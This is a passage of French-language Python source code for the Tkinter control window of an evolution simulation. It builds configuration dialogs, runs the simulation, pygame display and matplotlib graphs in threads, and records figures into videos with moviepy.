self.stop_matplotlib()
message_confirmation = messagebox.askyesno(*TK_MESSAGE_BOX_QUITTER)
if message_confirmation:
self.stop_enregistrement.set(True)
self.app.quit()
self.app = None
# Tkinter function : Pour les configurations => new_simulation_frame() et new_pygame_fame()
def tk_conf_frame(self, master_frame, command_valider, list_configs: list, list_type_label_frame: list,
frame_size: str, title: str, buttons_frame_weights: list, configs_caracteres: bool = False,
button_master=None):
dic_tkvar = {
conf: tkinter.IntVar(value=self.tk_valeurs_configurations[conf])
if DIC_CONFIGURATIONS[conf][PARAM_TYPE] == int
else (tkinter.BooleanVar(value=self.tk_valeurs_configurations[conf])
if DIC_CONFIGURATIONS[conf][PARAM_TYPE] == bool
else tkinter.DoubleVar(value=self.tk_valeurs_configurations[conf]))
for conf in list_configs}
dic_tkvar_caractere = {}
if configs_caracteres:
dic_tkvar_caractere = {
caractere: {
param: tkinter.IntVar(value=value) if (DIC_CARACTERES_INDIVIDU[caractere][PARAM_TYPE] == int
and not param == PARAM_PROBA_MUTATION)
else (tkinter.BooleanVar(value=value)
if param == PARAM_ALEATOIRE else tkinter.DoubleVar(value=value))
for param, value in dic_params.items()}
for caractere, dic_params in self.tk_valeurs_caracteres_individus.items()}
def command_button_valider():
if check_value.get():
for conf, var in dic_tkvar.items():
self.tk_valeurs_configurations[conf] = var.get()
if configs_caracteres:
for car, dic in dic_tkvar_caractere.items():
for param, var in dic.items():
self.tk_valeurs_caracteres_individus[car][param] = var.get()
if button_master is not None:
button_master["state"] = "normal"
frame.destroy()
if configs_caracteres:
command_valider({conf: var.get() for conf, var in dic_tkvar.items()},
{car: {conf: var.get() for conf, var in dic.items()}
for car, dic in dic_tkvar_caractere.items()})
else:
command_valider({conf: var.get() for conf, var in dic_tkvar.items()})
def command_button_reset():
for conf, var in dic_tkvar.items():
var.set(DIC_CONFIGURATIONS[conf][PARAM_DEFAULT_VALUE])
if configs_caracteres:
for car, dic in dic_tkvar_caractere.items():
for param, var in dic.items():
var.set(DIC_CARACTERES_INDIVIDU[car][param])
def command_quitter():
frame.destroy()
if button_master is not None:
button_master["state"] = "normal"
if button_master is not None:
button_master["state"] = "disabled"
nb_rows = (4 + len(list_type_label_frame))
frame = new_top_frame(master_frame, frame_size, TK_CAPTION_TEXT, title, [1] * nb_rows, [1, 1, 1])
frame.protocol("WM_DELETE_WINDOW", command_quitter)
for i, type_label_frame in enumerate(list_type_label_frame):
label_frame = new_config_label_frame(frame, dic_tkvar, type_label_frame)
label_frame.grid(row=1 + i, column=0, columnspan=3,
padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
buttons_frame = new_label_frame(frame, TK_CONFIG_AVANCES_TEXT, *buttons_frame_weights)
check_value = tkinter.BooleanVar()
check_value.set(True)
check_button = tkinter.Checkbutton(frame,
text=TK_CHECKBUTTON_KEEP_CONF,
font=TK_LABEL_FONT,
variable=check_value)
button_valider = tkinter.Button(frame,
text=TK_VALIDER_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=command_button_valider)
button_reset = tkinter.Button(frame,
text=TK_RESET_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=command_button_reset)
button_annuler = tkinter.Button(frame,
text=TK_ANNULER_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=command_quitter)
buttons_frame.grid(row=nb_rows - 3, column=0, columnspan=3, pady=TK_MARGE_WIDGET,
padx=TK_MARGE_WIDGET, sticky="nsew")
check_button.grid(row=nb_rows - 2, column=0, columnspan=3, padx=TK_MARGE_WIDGET, sticky="nsw")
button_annuler.grid(row=nb_rows - 1, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
button_reset.grid(row=nb_rows - 1, column=1, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
button_valider.grid(row=nb_rows - 1, column=2, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
if configs_caracteres:
return buttons_frame, dic_tkvar, dic_tkvar_caractere
return buttons_frame, dic_tkvar
# Simulation
def new_simulation_frame(self):
avancees_frame_configurations, dic_tkvar, dic_tkvar_caracteres = \
self.tk_conf_frame(self.app, self.new_simulation, LISTE_CONFIGS_SIMULATION_ONLY,
[FRAME_GENERAL, FRAME_DEPART], TK_CONFIG_FRAME_SIZE, TK_TITLE_CONF_TEXT,
[[1], [1, 1, 1]], True, self.tk_buttons_simulation[NEW_BUTTON])
def fame_conf_avancees():
def quitte_fame_conf_avancees():
frame_conf_avancees.destroy()
button_avancees["state"] = "normal"
button_avancees["state"] = "disabled"
frame_conf_avancees = new_top_frame(avancees_frame_configurations, TK_CONFIG_AVANCEES_FRAME_SIZE,
TK_CAPTION_TEXT, TK_TITLE_CONF_TEXT, [1, 6], [1, 1, 1])
frame_conf_avancees.protocol("WM_DELETE_WINDOW", quitte_fame_conf_avancees)
for i, type_frame in enumerate([FRAME_AVANCEES_CARTE,
FRAME_AVANCEES_CARTE_ALTITUDES,
FRAME_AVANCEES_NOURRITURE]):
label_frame = new_config_label_frame(frame_conf_avancees, dic_tkvar, type_frame)
label_frame.grid(column=i, row=1, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
def fame_conf_caracteres():
def quitte_fame_conf_avancees():
frame_conf_caractere.destroy()
button_caracteres["state"] = "normal"
button_caracteres["state"] = "disabled"
frame_conf_caractere = new_top_frame(avancees_frame_configurations, TK_CONFIG_CARACTERES_FRAME_SIZE,
TK_CAPTION_TEXT, TK_TITLE_CONF_TEXT, [1, 6],
[1] * len(LISTE_PARAM_CARACTERES_INDIVIDUS_TITLE))
frame_conf_caractere.protocol("WM_DELETE_WINDOW", quitte_fame_conf_avancees)
for i, (param, title) in enumerate(LISTE_PARAM_CARACTERES_INDIVIDUS_TITLE):
if param == PARAM_VALUE:
frame = new_label_frame(frame_conf_caractere, title, [1] * len(LISTE_CARACTERES_INDIVIDU), [1, 2])
else:
frame = new_label_frame(frame_conf_caractere, title, [1] * len(LISTE_CARACTERES_INDIVIDU), [1])
for j, caractere in enumerate(LISTE_CARACTERES_INDIVIDU):
if param == PARAM_LABEL:
label = tkinter.Label(frame,
text=DIC_CARACTERES_INDIVIDU[caractere][PARAM_LABEL],
font=TK_LABEL_FONT)
label.grid(column=0, row=j)
else:
if param in [PARAM_VALUE, PARAM_MIN_VALUE, PARAM_MAX_VALUE]:
from_ = DIC_CARACTERES_INDIVIDU[caractere][PARAM_MIN_VALUE]
to = DIC_CARACTERES_INDIVIDU[caractere][PARAM_MAX_VALUE]
resolution = DIC_CARACTERES_INDIVIDU[caractere][PARAM_STEP]
elif param == PARAM_DEGRE_MUTATION:
from_ = DIC_CARACTERES_INDIVIDU[caractere][PARAM_DEGRE_MUTATION_MIN]
to = DIC_CARACTERES_INDIVIDU[caractere][PARAM_DEGRE_MUTATION_MAX]
resolution = DIC_CARACTERES_INDIVIDU[caractere][PARAM_DEGRE_MUTATION_STEP]
else:
from_ = PROBA_MUTATION_MIN
to = PROBA_MUTATION_MAX
resolution = PROBA_MUTATION_STEP
scale = tkinter.Scale(frame,
orient="horizontal",
from_=from_,
to=to,
resolution=resolution,
font=TK_LABEL_FONT,
variable=dic_tkvar_caracteres[caractere][param])
if param == PARAM_VALUE:
checkbutton = tkinter.Checkbutton(frame,
variable=dic_tkvar_caracteres[caractere][PARAM_ALEATOIRE])
checkbutton.grid(column=0, row=j, padx=TK_MARGE_WIDGET // 2, pady=TK_MARGE_WIDGET,
sticky="nsew")
scale.grid(column=1, row=j, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
else:
scale.grid(column=0, row=j, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
frame.grid(column=i, row=1, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
def fame_conf_individu():
def quitte_fame_conf_avancees():
frame_conf_individus.destroy()
button_individus["state"] = "normal"
button_individus["state"] = "disabled"
frame_conf_individus = new_top_frame(avancees_frame_configurations, TK_CONFIG_INDIVIDUS_FRAME_SIZE,
TK_CAPTION_TEXT, TK_TITLE_CONF_TEXT, [1, 6], [1])
frame_conf_individus.protocol("WM_DELETE_WINDOW", quitte_fame_conf_avancees)
label_frame = new_config_label_frame(frame_conf_individus, dic_tkvar, FRAME_AVANCEES_INDIVIDUS)
label_frame.grid(column=0, row=1, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
button_avancees = tkinter.Button(avancees_frame_configurations,
text=TK_CONFIG_AVANCEES_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=fame_conf_avancees)
button_individus = tkinter.Button(avancees_frame_configurations,
text=TK_CONFIG_INDIVIDUS_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=fame_conf_individu)
button_caracteres = tkinter.Button(avancees_frame_configurations,
text=TK_CONFIG_CARACTERE_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=fame_conf_caracteres)
button_avancees.grid(column=0, row=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
button_individus.grid(column=1, row=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
button_caracteres.grid(column=2, row=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
def new_simulation(self, dic_configurations: dict, dic_conf_caracteres: dict):
self.stop_simulation()
self.stop_pygame()
self.stop_matplotlib()
message_confirmation = messagebox.askyesno(*TK_MESSAGE_BOX_NOUVEAU)
if message_confirmation:
thread_new_environnement = Thread(target=self.new_environnement, args=[dic_configurations,
dic_conf_caracteres])
thread_new_environnement.start()
def start_simulation(self):
if not self.running_simu:
self.running_simu = True
thread_simu = Thread(target=self.run_simulation)
thread_simu.start()
self.tk_buttons_simulation[START_BUTTON]["state"] = "disabled"
self.tk_buttons_simulation[STOP_BUTTON]["state"] = "normal"
def stop_simulation(self):
if self.tk_var_stop_init_new_environnement is not None:
self.tk_var_stop_init_new_environnement.set(True)
if self.running_simu:
self.running_simu = False
self.tk_buttons_simulation[START_BUTTON]["state"] = "normal"
self.tk_buttons_simulation[STOP_BUTTON]["state"] = "disabled"
# Pygame
def new_pygame_fame(self):
avancees_frame_new_pygame, dic_tkvar = self.tk_conf_frame(self.app, self.new_pygame, LISTE_CONFIGS_PYGAME_ONLY,
[FRAME_PYGAME_GENERAL], TK_PYGAME_FRAME_SIZE,
TK_TITLE_PYGAME_TEXT, [[1], [1]],
button_master=self.tk_buttons_pygame[NEW_BUTTON])
def pygame_fame_conf_avancees():
def quitte_fame_conf_avancees():
frame_new_pygame_avancees.destroy()
button_avancees["state"] = "normal"
button_avancees["state"] = "disabled"
frame_new_pygame_avancees = new_top_frame(avancees_frame_new_pygame, TK_PYGAME_FRAME_AVANCEE_SIZE,
TK_CAPTION_TEXT, TK_TITLE_PYGAME_TEXT, [1, 1], [1])
frame_new_pygame_avancees.protocol("WM_DELETE_WINDOW", quitte_fame_conf_avancees)
avancees_frame = new_config_label_frame(frame_new_pygame_avancees, dic_tkvar, FRAME_PYGAME_AVANCEES)
avancees_frame.grid(row=1, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
button_avancees = tkinter.Button(avancees_frame_new_pygame,
text=TK_CONFIG_AVANCEES_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=pygame_fame_conf_avancees)
button_avancees.grid(row=2, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
def new_pygame(self, dic_configurations):
if not self.running_pygame:
self.running_pygame = True
thread_pygame = Thread(target=self.run_affichage_pygame, args=[dic_configurations])
thread_pygame.start()
self.tk_buttons_pygame[NEW_BUTTON]["state"] = "disabled"
self.tk_buttons_pygame[STOP_BUTTON]["state"] = "normal"
def stop_pygame(self):
if self.running_pygame:
self.running_pygame = False
self.tk_buttons_pygame[NEW_BUTTON]["state"] = "normal"
self.tk_buttons_pygame[STOP_BUTTON]["state"] = "disabled"
# Matplotlib
def new_matplotlib_fame(self):
def observeur_radiobutton_graph(*_):
if var_graph.get():
for child in frame_3D.winfo_children():
child.configure(state="disable")
else:
for child in frame_3D.winfo_children():
if child.winfo_class() == "TCombobox":
child.configure(state="readonly")
else:
child.configure(state="normal")
def command_button_valider():
self.new_matplotlib(var_graph.get(),
[(LISTE_CARACTERES_INDIVIDU + LISTE_CARACTERES_INDIVIDU_SECONDAIRES)[ld.current()]
for ld in liste_listes_deroulantes], tk_var_vitesse_rotation.get(),
tk_var_hauteur_z.get())
frame_new_matplotlib.destroy()
frame_new_matplotlib = new_top_frame(self.app, TK_MATPLOTLIB_FRAME_SIZE, TK_CAPTION_TEXT, TK_TITLE_MATPLOT_TEXT,
[1, 1, 1, 1], [1, 1, 1])
frame_new_matplotlib.protocol("WM_DELETE_WINDOW", frame_new_matplotlib.destroy)
var_graph = tkinter.BooleanVar(frame_new_matplotlib, value=False)
var_graph.trace("w", observeur_radiobutton_graph)
graph_pop = tkinter.Radiobutton(frame_new_matplotlib,
text=TK_MATPLOT_RADIOBUTTON_POPULATION_TEXT,
font=TK_LABEL_FONT,
value=True,
variable=var_graph)
graph_3D = tkinter.Radiobutton(frame_new_matplotlib,
text=TK_MATPLOT_RADIOBUTTON_3D_TEXT,
font=TK_LABEL_FONT,
value=False,
variable=var_graph)
button_valider = tkinter.Button(frame_new_matplotlib,
text=TK_VALIDER_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=command_button_valider)
button_annuler = tkinter.Button(frame_new_matplotlib,
text=TK_ANNULER_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=frame_new_matplotlib.destroy)
frame_3D = new_label_frame(frame_new_matplotlib, "", [1] * 5, [1, 1])
list_caracteres = [DIC_CARACTERES_INDIVIDU[caractere][PARAM_LABEL]
for caractere in LISTE_CARACTERES_INDIVIDU + LISTE_CARACTERES_INDIVIDU_SECONDAIRES]
liste_listes_deroulantes = []
for i, title in enumerate(TK_LABELS_MATPLOT_AXES):
text_label = tkinter.Label(frame_3D,
text=title,
font=TK_LABEL_FONT)
text_label.grid(row=i,
column=0,
sticky="nsew")
liste_deroulante = ttk.Combobox(frame_3D,
values=list_caracteres,
state="readonly",
font=TK_LABEL_FONT)
liste_deroulante.current(i)
liste_deroulante.grid(row=i, column=1, sticky="nsew", pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET)
liste_listes_deroulantes.append(liste_deroulante)
tk_var_vitesse_rotation = tkinter.DoubleVar(frame_3D)
tk_var_hauteur_z = tkinter.IntVar(frame_3D)
for row, variable, type_scale in [(3, tk_var_vitesse_rotation, SCALE_MATPLOTLIB_3D_VITESSE_ROTATION),
(4, tk_var_hauteur_z, SCALE_MATPLOTLIB_3D_HAUTEUR_Z)]:
scale = new_scale(frame_3D, type_scale, variable)
variable.set(DIC_SCALE[type_scale][PARAM_DEFAULT_VALUE])
scale.grid(row=row, column=0, columnspan=2, sticky="nsew", padx=TK_MARGE_WIDGET)
graph_pop.grid(row=1, column=0, columnspan=3, sticky="nsw", pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET)
graph_3D.grid(row=2, column=0, sticky="nw", pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET)
button_annuler.grid(row=3, column=0, columnspan=2, sticky="nsew", pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET)
button_valider.grid(row=3, column=2, sticky="nsew", pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET)
frame_3D.grid(row=2, column=1, columnspan=2, sticky="nsew", pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET)
var_graph.set(True)
def new_matplotlib(self, graph: bool, caractere_3D: list, vitesse_rotate: float, hauteur_z: int):
if not self.running_matplotbil:
self.running_matplotbil = True
thread_matplotbil = Thread(target=self.run_graphs_matplotlib,
args=[graph, caractere_3D, vitesse_rotate, hauteur_z])
thread_matplotbil.start()
self.tk_buttons_matplotbil[STOP_BUTTON]["state"] = "normal"
self.tk_buttons_matplotbil[NEW_BUTTON]["state"] = "normal"
def stop_matplotlib(self):
if self.running_matplotbil:
self.running_matplotbil = False
self.tk_buttons_matplotbil[STOP_BUTTON]["state"] = "disabled"
self.tk_buttons_matplotbil[NEW_BUTTON]["state"] = "disabled"
# Moviepy
def new_moviepy_frame(self):
id_dossier_fig = []
def liste_figures_matplotlib():
return [f"Figure {id_f}" for id_f in self.list_id_figs_matplotlib]
def observeur_nb_figures_matplotlib(*_):
liste = liste_figures_matplotlib()
if len(liste) == 0:
quitter()
else:
liste_deroulante["values"] = liste
def observeur_nb_jours(*_):
label_nb_images["text"] = TK_LABEL_MOVIEPY_NB_IMAGES + str(var_nb_jours.get())
label_duree["text"] = (TK_LABEL_MOVIEPY_DUREE_ENREGISTREMENT[0] +
str(round(var_nb_jours.get() / tk_fps_moviepy.get(), 2)) +
TK_LABEL_MOVIEPY_DUREE_ENREGISTREMENT[1])
button_sss["state"] = "normal"
def observateur_affiche_miniature(*_):
if tk_affiche_miniature.get():
scale_size_miniature["state"] = "normal"
scale_coef_froid["state"] = "normal"
else:
scale_size_miniature["state"] = "disabled"
scale_coef_froid["state"] = "disabled"
def command_button_sss():
if len(id_dossier_fig) == 0:
for child in frame_images.winfo_children():
if child in [frame_radiobuttons, frame_miniature]:
for child_child in child.winfo_children():
child_child.configure(state="disable")
else:
child.configure(state="disable")
button_sss.config(text=TK_STOP_BUTTON_TEXT, state="disabled")
self.tk_nb_figs_matplotlib.trace_remove("write", cbname_observeur)
tk_affiche_miniature.trace_remove("write", cbname_observeur_miniature)
id_fig = self.new_moviepy(self.list_id_figs_matplotlib[liste_deroulante.current()],
tk_periode_image.get(), var_nb_jours, tk_resolution.get(),
tk_affiche_miniature.get(), scale_size_miniature.get(),
scale_coef_froid.get())
id_dossier_fig.append(id_fig)
elif len(id_dossier_fig) == 1:
nom_dossier = self.stop_moviepy(id_dossier_fig[0])
button_sss["text"] = TK_SAUVER_BUTTON_TEXT
id_dossier_fig.append(nom_dossier)
else:
nom_fichier = id_dossier_fig[1].split("/")[-1]
emplacement_fichier_mp3 = filedialog.asksaveasfile(parent=frame_new_moviepy,
defaultextension=FORMAT_VIDEOS,
initialdir=id_dossier_fig[1][:-len(nom_fichier)],
initialfile=f"{nom_fichier}{FORMAT_VIDEOS}",
title=TK_TITLE_MOVIEPY_ENREGISTREMENT_BROWSE_TEXT,
filetypes=TK_FILESTYPES_BROWSE_SAVE_VIDEO)
if emplacement_fichier_mp3 is not None:
thread_save_moviepy = Thread(target=self.save_moviepy, args=[emplacement_fichier_mp3.name,
id_dossier_fig[1],
tk_fps_moviepy.get(),
var_nb_jours.get(),
keep_images.get()])
thread_save_moviepy.start()
frame_new_moviepy.destroy()
self.stop_enregistrement.trace_remove("write", observeur_stop_enregistrement)
def stop_enregistrement(*_):
if self.stop_enregistrement.get():
quitter(True)
def quitter(forcer=False):
if len(id_dossier_fig) == 0:
frame_new_moviepy.destroy()
self.tk_nb_figs_matplotlib.trace_remove("write", cbname_observeur)
self.stop_enregistrement.trace_remove("write", observeur_stop_enregistrement)
else:
stop = False
if forcer:
stop = True
else:
message_confirmation = messagebox.askyesno(*TK_MESSAGE_BOX_ENREGISTEMENT, parent=frame_new_moviepy)
if message_confirmation:
stop = True
if stop:
if len(id_dossier_fig) == 1:
nom_dossier = self.stop_moviepy(id_dossier_fig[0])
clear_images_moviepy(nom_dossier, var_nb_jours.get())
elif len(id_dossier_fig) == 2:
clear_images_moviepy(id_dossier_fig[1], var_nb_jours.get())
frame_new_moviepy.destroy()
self.stop_enregistrement.trace_remove("write", observeur_stop_enregistrement)
frame_new_moviepy = new_top_frame(self.app, TK_MOVIEPY_FRAME_SIZE, TK_CAPTION_TEXT, TK_TITLE_MOVIEPY_TEXT,
[1] * 5, [1, 1])
cbname_observeur = self.tk_nb_figs_matplotlib.trace_add("write", observeur_nb_figures_matplotlib)
observeur_stop_enregistrement = self.stop_enregistrement.trace_add("write", stop_enregistrement)
frame_new_moviepy.protocol("WM_DELETE_WINDOW", quitter)
tk_fps_moviepy = tkinter.IntVar(frame_new_moviepy, DIC_SCALE[SCALE_MOVIEPY_FPS][PARAM_DEFAULT_VALUE])
keep_images = tkinter.BooleanVar(frame_new_moviepy, False)
var_nb_jours = tkinter.IntVar(frame_new_moviepy, -1)
button_sss = tkinter.Button(frame_new_moviepy,
text=TK_VALIDER_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=command_button_sss)
tk_fps_moviepy.trace_add("write", observeur_nb_jours)
var_nb_jours.trace_add("write", observeur_nb_jours)
# --------------------------------------------------------
frame_images = new_label_frame(frame_new_moviepy, TK_LISTE_TITLE_MOVIEPY_FRAMES_TEXT[0], [1, 1, 1], [1, 1])
tk_periode_image = tkinter.IntVar(frame_images, DIC_SCALE[SCALE_MOVIEPY_PERIODE][PARAM_DEFAULT_VALUE])
tk_resolution = tkinter.IntVar(frame_images)
liste_deroulante = ttk.Combobox(frame_images,
values=liste_figures_matplotlib(),
state="readonly",
font=TK_LABEL_FONT)
liste_deroulante.current(0)
periode_scale = new_scale(frame_images, SCALE_MOVIEPY_PERIODE, tk_periode_image)
frame_radiobuttons = new_label_frame(frame_images, TK_LISTE_TITLE_MOVIEPY_FRAMES_TEXT[1],
[1] * len(LISTE_SIZE_ENREGISTREMENT), [1])
liste_radiobuttons = []
for type_size in LISTE_SIZE_ENREGISTREMENT:
liste_radiobuttons.append(tkinter.Radiobutton(frame_radiobuttons,
text=DIC_SIZE_ENREGISTREMENT[type_size][PARAM_ENR_LABEL],
font=TK_LABEL_FONT,
value=type_size,
variable=tk_resolution))
frame_miniature = new_label_frame(frame_images, TK_LISTE_TITLE_MOVIEPY_FRAMES_TEXT[2], [1, 1, 1], [1])
tk_affiche_miniature = tkinter.BooleanVar(frame_miniature, True)
cbname_observeur_miniature = tk_affiche_miniature.trace_add("write", observateur_affiche_miniature)
check_button_miniature = tkinter.Checkbutton(frame_miniature,
text=TK_CHECKBUTTON_MOVIEPY_AFFICHER_MINIATURE,
font=TK_LABEL_FONT,
variable=tk_affiche_miniature)
scale_size_miniature = \
new_scale(frame_miniature, SCALE_MOVIEPY_SIZE_MINIATURE,
tkinter.DoubleVar(frame_miniature,
value=DIC_SCALE[SCALE_MOVIEPY_SIZE_MINIATURE][PARAM_DEFAULT_VALUE]))
scale_coef_froid = \
new_scale_config(frame_miniature, COEF_AFFICHAGE_ENERGIE_DEPENSEE,
tkinter.DoubleVar(frame_miniature, value=DIC_CONFIGURATIONS[
COEF_AFFICHAGE_ENERGIE_DEPENSEE][PARAM_DEFAULT_VALUE]))
check_button_miniature.grid(row=0, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsw")
scale_size_miniature.grid(row=1, column=0, padx=TK_MARGE_WIDGET, sticky="nsew")
scale_coef_froid.grid(row=2, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
liste_deroulante.grid(row=0, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="sew")
periode_scale.grid(row=2, column=0, columnspan=2, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
frame_radiobuttons.grid(row=1, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
for i, radiobutton in enumerate(liste_radiobuttons):
radiobutton.grid(row=i, column=0, padx=TK_MARGE_WIDGET, sticky="nsw")
frame_miniature.grid(row=0, column=1, rowspan=2, padx=TK_MARGE_WIDGET, sticky="nsew")
tk_resolution.set(SIZE_ENREGISTREMENT_DEFAULT)
# --------------------------------------------------------
frame_videos = new_label_frame(frame_new_moviepy, TK_LISTE_TITLE_MOVIEPY_FRAMES_TEXT[3], [1] * 3, [1])
label_nb_images = tkinter.Label(frame_videos,
font=TK_LABEL_FONT)
fps_scale = new_scale(frame_videos, SCALE_MOVIEPY_FPS, tk_fps_moviepy)
label_duree = tkinter.Label(frame_videos,
font=TK_LABEL_FONT)
var_nb_jours.set(0)
label_nb_images.grid(row=0, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsw")
fps_scale.grid(row=1, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
label_duree.grid(row=2, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsw")
# --------------------------------------------------------
check_button = tkinter.Checkbutton(frame_new_moviepy,
text=TK_CHECKBUTTON_ENR_KEEP_IMAGES,
font=TK_LABEL_FONT,
variable=keep_images)
button_annuler = tkinter.Button(frame_new_moviepy,
text=TK_ANNULER_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=quitter)
frame_images.grid(row=1, column=0, columnspan=2, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
frame_videos.grid(row=2, column=0, columnspan=2, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
check_button.grid(row=3, column=0, columnspan=2, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsw")
button_sss.grid(row=4, column=1, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
button_annuler.grid(row=4, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
def init_chemins_videos(self):
self.chemin_videos = f"{CHEMIN_SAUVEGARDE_VIDEO}"
if not os.path.exists(self.chemin_videos):
os.makedirs(self.chemin_videos)
while os.path.exists(self.chemin_videos):
self.num_simulation += 1
self.chemin_videos = f"{CHEMIN_SAUVEGARDE_VIDEO}/{SIMULATION_NOM_DOSSIER}{self.num_simulation}"
os.makedirs(self.chemin_videos)
def new_moviepy(self, id_fig: int, periode: int, var_nb_jours: tkinter.IntVar, type_resolution: int,
afficher_miniature, taille_miniature, coef_temperature_miniature):
if self.chemin_videos == "":
self.init_chemins_videos()
nom_dossier = f"{self.chemin_videos}/{FIGURE_NOM_DOSSIER}{id_fig}"
n = 1
while os.path.exists(nom_dossier) or os.path.exists(f"{os.path.exists(nom_dossier)}{FORMAT_VIDEOS}"):
n += 1
nom_dossier = f"{self.chemin_videos}/{FIGURE_NOM_DOSSIER}{id_fig}_{n}"
os.makedirs(nom_dossier)
return self.environnement.stats.new_enregistrement(id_fig, var_nb_jours, nom_dossier, periode, type_resolution,
afficher_miniature, taille_miniature,
coef_temperature_miniature)
def stop_moviepy(self, id_fig: int):
nom_dossier = self.environnement.stats.dic_figures_enregistrement[id_fig][PARAM_MATPLOTLIB_NOM_DOSSIER]
del self.environnement.stats.dic_id_figs[id_fig]
del self.environnement.stats.dic_figures_enregistrement[id_fig]
return nom_dossier
# Threading
def new_environnement(self, dic_configurations: dict, dic_conf_caracteres: dict):
tk_var_stop_init_new_environnement = tkinter.BooleanVar(self.app, value=False)
self.tk_var_stop_init_new_environnement = tk_var_stop_init_new_environnement
self.stop_enregistrement.set(True)
self.tk_buttons_simulation[START_BUTTON].config(text=TK_START_BUTTON_PLEASE_WAIT_TEXT, state="disabled")
self.tk_buttons_simulation[STOP_BUTTON]["state"] = "normal"
self.tk_buttons_pygame[NEW_BUTTON]["state"] = "disabled"
self.tk_buttons_matplotbil[START_BUTTON]["state"] = "disabled"
def observateur_avancement(*_):
self.tk_buttons_simulation[START_BUTTON]["text"] = f"{int(100 * tk_var_avancement.get())} %"
tk_var_avancement = tkinter.DoubleVar(self.app, value=0.)
cbname_observeur_avancement = tk_var_avancement.trace_add("write", observateur_avancement)
environnement = Environnement(dic_configurations, dic_conf_caracteres, tk_var_stop_init_new_environnement,
tk_var_avancement)
tk_var_avancement.trace_remove("write", cbname_observeur_avancement)
if self.tk_var_stop_init_new_environnement == tk_var_stop_init_new_environnement:
self.tk_var_stop_init_new_environnement = None
if environnement.init_terminee:
self.environnement = environnement
self.chemin_videos = ""
self.stop_enregistrement.set(False)
self.tk_buttons_simulation[START_BUTTON].config(text=TK_START_BUTTON_TEXT, state="normal")
self.tk_buttons_simulation[STOP_BUTTON]["state"] = "disabled"
self.tk_buttons_pygame[NEW_BUTTON]["state"] = "normal"
self.tk_buttons_matplotbil[START_BUTTON]["state"] = "normal"
def save_moviepy(self, emplacement_fichier_mp3, nom_dossier: str, fps: int, nb_images: int, keep_images: bool):
frame_saving = new_top_frame(self.app, TK_MOVIEPY_ENREGISTREMENT_FRAME_SIZE, TK_CAPTION_TEXT,
TK_TITLE_MOVIEPY_ENREGISTREMENT_TEXT, [1, 1], [1])
text = tkinter.Label(frame_saving,
text=emplacement_fichier_mp3,
font=TK_LABEL_FONT)
text.grid(row=1, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
frame_saving.protocol("WM_DELETE_WINDOW", lambda *_: None)
# os.remove(emplacement_fichier_mp3)
clip = Movieclip.ImageSequenceClip([f"{nom_dossier}/{i}{FORMAT_IMAGES}" for i in range(1, nb_images + 1)
if os.path.exists(f"{nom_dossier}/{i}{FORMAT_IMAGES}")],
fps=fps)
clip.write_videofile(emplacement_fichier_mp3, verbose=False, logger=None, audio=False)
if not keep_images:
clear_images_moviepy(nom_dossier, nb_images)
frame_saving.destroy()
def run_simulation(self):
while self.running_simu:
self.environnement.update()
time.sleep(self.delay_simulation.get())
def run_affichage_pygame(self, dic_configurations):
pygame.init()
pygame.display.set_caption(CAPTION)
if dic_configurations[PLEIN_ECRAN]:
screen = pygame.display.set_mode((dic_configurations[LARGEUR_ECRAN],
dic_configurations[HAUTEUR_ECRAN]), pygame.FULLSCREEN)
else:
